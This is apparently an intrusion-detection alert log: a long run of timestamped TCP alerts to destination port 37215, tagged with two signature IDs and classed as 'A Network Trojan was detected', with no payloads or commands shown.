                  Timestamp:07/10/24-08:27:22.498081
                  SID:2835222
                  Source Port:49938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.775037
                  SID:2829579
                  Source Port:49790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.462338
                  SID:2835222
                  Source Port:34702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.098099
                  SID:2835222
                  Source Port:54586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.436089
                  SID:2829579
                  Source Port:48120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.808295
                  SID:2829579
                  Source Port:46338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.831755
                  SID:2835222
                  Source Port:51844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.340755
                  SID:2829579
                  Source Port:39878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.864771
                  SID:2835222
                  Source Port:60864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.547773
                  SID:2829579
                  Source Port:60170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.315595
                  SID:2835222
                  Source Port:38860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.535361
                  SID:2835222
                  Source Port:40952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.855166
                  SID:2829579
                  Source Port:59946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.855576
                  SID:2835222
                  Source Port:33842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.000964
                  SID:2829579
                  Source Port:43120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.584136
                  SID:2835222
                  Source Port:47660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.079207
                  SID:2829579
                  Source Port:58402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.839677
                  SID:2829579
                  Source Port:36112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.410833
                  SID:2835222
                  Source Port:57550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.352052
                  SID:2829579
                  Source Port:57710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.963171
                  SID:2829579
                  Source Port:49828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.027380
                  SID:2835222
                  Source Port:48066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.965572
                  SID:2829579
                  Source Port:45580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.320404
                  SID:2835222
                  Source Port:49258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.858486
                  SID:2835222
                  Source Port:47700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.617546
                  SID:2829579
                  Source Port:42938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.611517
                  SID:2835222
                  Source Port:57054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.751989
                  SID:2829579
                  Source Port:41240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.939106
                  SID:2835222
                  Source Port:57058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.018095
                  SID:2835222
                  Source Port:51368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.215093
                  SID:2835222
                  Source Port:60826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.858149
                  SID:2829579
                  Source Port:50636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.998710
                  SID:2829579
                  Source Port:58946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.605361
                  SID:2829579
                  Source Port:53060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.852572
                  SID:2835222
                  Source Port:58420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.781543
                  SID:2829579
                  Source Port:59960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.842184
                  SID:2835222
                  Source Port:46510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.548975
                  SID:2829579
                  Source Port:54366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.575059
                  SID:2835222
                  Source Port:34430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.837705
                  SID:2829579
                  Source Port:36522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.411033
                  SID:2835222
                  Source Port:34672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.342477
                  SID:2835222
                  Source Port:34764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.623300
                  SID:2835222
                  Source Port:47974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.567555
                  SID:2835222
                  Source Port:44228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.775868
                  SID:2829579
                  Source Port:36596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.583025
                  SID:2835222
                  Source Port:53968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.412825
                  SID:2829579
                  Source Port:53714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.357682
                  SID:2829579
                  Source Port:38184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.224904
                  SID:2829579
                  Source Port:33252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.437142
                  SID:2829579
                  Source Port:41128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.307803
                  SID:2829579
                  Source Port:32868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.923272
                  SID:2835222
                  Source Port:40362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.943853
                  SID:2829579
                  Source Port:40544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.501459
                  SID:2829579
                  Source Port:45304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.893689
                  SID:2829579
                  Source Port:53866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.888378
                  SID:2829579
                  Source Port:33278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.871003
                  SID:2829579
                  Source Port:46776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.763647
                  SID:2835222
                  Source Port:43846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.570720
                  SID:2835222
                  Source Port:38250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.970962
                  SID:2829579
                  Source Port:51660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.389134
                  SID:2829579
                  Source Port:35764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.396105
                  SID:2829579
                  Source Port:49200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.843639
                  SID:2829579
                  Source Port:57168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.831960
                  SID:2829579
                  Source Port:33872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081950
                  SID:2829579
                  Source Port:51888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.681754
                  SID:2835222
                  Source Port:58860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.422019
                  SID:2835222
                  Source Port:35598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.135908
                  SID:2835222
                  Source Port:41098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.034591
                  SID:2835222
                  Source Port:39158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.834558
                  SID:2835222
                  Source Port:39240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.821569
                  SID:2829579
                  Source Port:53650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.645401
                  SID:2829579
                  Source Port:58932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.310609
                  SID:2835222
                  Source Port:44338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.530342
                  SID:2835222
                  Source Port:48414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.997172
                  SID:2829579
                  Source Port:50702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.710237
                  SID:2829579
                  Source Port:56858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.359553
                  SID:2829579
                  Source Port:37980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.764309
                  SID:2835222
                  Source Port:39618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.183618
                  SID:2835222
                  Source Port:37410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.510241
                  SID:2835222
                  Source Port:40664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.488855
                  SID:2835222
                  Source Port:42380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.942019
                  SID:2835222
                  Source Port:53678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.763825
                  SID:2835222
                  Source Port:58756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571797
                  SID:2835222
                  Source Port:36362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.821123
                  SID:2829579
                  Source Port:59458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.268658
                  SID:2829579
                  Source Port:41962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.301289
                  SID:2835222
                  Source Port:41214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.146425
                  SID:2835222
                  Source Port:51162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.743404
                  SID:2829579
                  Source Port:39520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.347841
                  SID:2829579
                  Source Port:55014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.594360
                  SID:2829579
                  Source Port:55206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.578460
                  SID:2829579
                  Source Port:53044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.761894
                  SID:2829579
                  Source Port:60998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.864255
                  SID:2829579
                  Source Port:44470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.134395
                  SID:2835222
                  Source Port:39610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.134395
                  SID:2829579
                  Source Port:35358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.644987
                  SID:2829579
                  Source Port:41448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.165723
                  SID:2829579
                  Source Port:57194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.803264
                  SID:2835222
                  Source Port:48012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.808295
                  SID:2835222
                  Source Port:38376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.800070
                  SID:2835222
                  Source Port:32774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.831646
                  SID:2829579
                  Source Port:45728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.349991
                  SID:2829579
                  Source Port:60520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.619153
                  SID:2835222
                  Source Port:35436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.043481
                  SID:2835222
                  Source Port:44738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.858149
                  SID:2829579
                  Source Port:32780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.000608
                  SID:2835222
                  Source Port:57252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:44.495455
                  SID:2835222
                  Source Port:50026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.913087
                  SID:2835222
                  Source Port:39340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.714271
                  SID:2829579
                  Source Port:55710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.099903
                  SID:2829579
                  Source Port:52162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.879292
                  SID:2835222
                  Source Port:37454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.185610
                  SID:2829579
                  Source Port:48054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.514525
                  SID:2829579
                  Source Port:46978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.131677
                  SID:2829579
                  Source Port:44874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.388281
                  SID:2829579
                  Source Port:46808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.389175
                  SID:2829579
                  Source Port:51170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.757846
                  SID:2835222
                  Source Port:33164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609289
                  SID:2829579
                  Source Port:48476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.199657
                  SID:2835222
                  Source Port:38018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.986836
                  SID:2835222
                  Source Port:51572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.532257
                  SID:2829579
                  Source Port:56540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.471512
                  SID:2829579
                  Source Port:36172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.661764
                  SID:2829579
                  Source Port:43422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.240752
                  SID:2835222
                  Source Port:43080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.870897
                  SID:2835222
                  Source Port:47504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.037168
                  SID:2829579
                  Source Port:53192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.615804
                  SID:2835222
                  Source Port:53078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.842206
                  SID:2829579
                  Source Port:57518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.852181
                  SID:2835222
                  Source Port:43358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.456232
                  SID:2835222
                  Source Port:52734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.163941
                  SID:2829579
                  Source Port:38754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.204295
                  SID:2829579
                  Source Port:56950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.365413
                  SID:2829579
                  Source Port:37630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.929011
                  SID:2829579
                  Source Port:47554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.501518
                  SID:2829579
                  Source Port:52840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.856885
                  SID:2835222
                  Source Port:49182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.209261
                  SID:2829579
                  Source Port:60780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.647678
                  SID:2829579
                  Source Port:58578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.259031
                  SID:2835222
                  Source Port:58984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.446922
                  SID:2829579
                  Source Port:51348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.065444
                  SID:2835222
                  Source Port:40700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.353895
                  SID:2829579
                  Source Port:39886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.262927
                  SID:2835222
                  Source Port:60662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.861470
                  SID:2829579
                  Source Port:54984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.239343
                  SID:2835222
                  Source Port:49942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.048430
                  SID:2835222
                  Source Port:51176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.554051
                  SID:2829579
                  Source Port:38074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.857933
                  SID:2835222
                  Source Port:48600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.973462
                  SID:2835222
                  Source Port:43092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.055063
                  SID:2829579
                  Source Port:33376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.146990
                  SID:2829579
                  Source Port:41682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.625074
                  SID:2829579
                  Source Port:40350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.308170
                  SID:2835222
                  Source Port:39440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.664238
                  SID:2829579
                  Source Port:45966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.286969
                  SID:2829579
                  Source Port:60110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.456007
                  SID:2835222
                  Source Port:35124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.621432
                  SID:2829579
                  Source Port:44116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.352654
                  SID:2829579
                  Source Port:52490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.976551
                  SID:2829579
                  Source Port:40816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.673151
                  SID:2835222
                  Source Port:55004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.072006
                  SID:2829579
                  Source Port:38908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.217028
                  SID:2835222
                  Source Port:48508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.334511
                  SID:2829579
                  Source Port:54298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.802852
                  SID:2835222
                  Source Port:34280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.926271
                  SID:2835222
                  Source Port:33462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.739643
                  SID:2835222
                  Source Port:54892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.910234
                  SID:2835222
                  Source Port:39012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.051778
                  SID:2835222
                  Source Port:59930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.553055
                  SID:2835222
                  Source Port:42694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.785283
                  SID:2829579
                  Source Port:44642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.877507
                  SID:2829579
                  Source Port:42764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.073080
                  SID:2829579
                  Source Port:58258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.316362
                  SID:2835222
                  Source Port:35848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.535959
                  SID:2835222
                  Source Port:44832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.889582
                  SID:2835222
                  Source Port:40242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.878204
                  SID:2835222
                  Source Port:45200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.574763
                  SID:2829579
                  Source Port:38180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.906271
                  SID:2829579
                  Source Port:42628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.398717
                  SID:2835222
                  Source Port:34012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.815899
                  SID:2829579
                  Source Port:37732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.350374
                  SID:2835222
                  Source Port:49874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.574047
                  SID:2829579
                  Source Port:42914
                  Destination Port:37215
                  Protocol:TCP
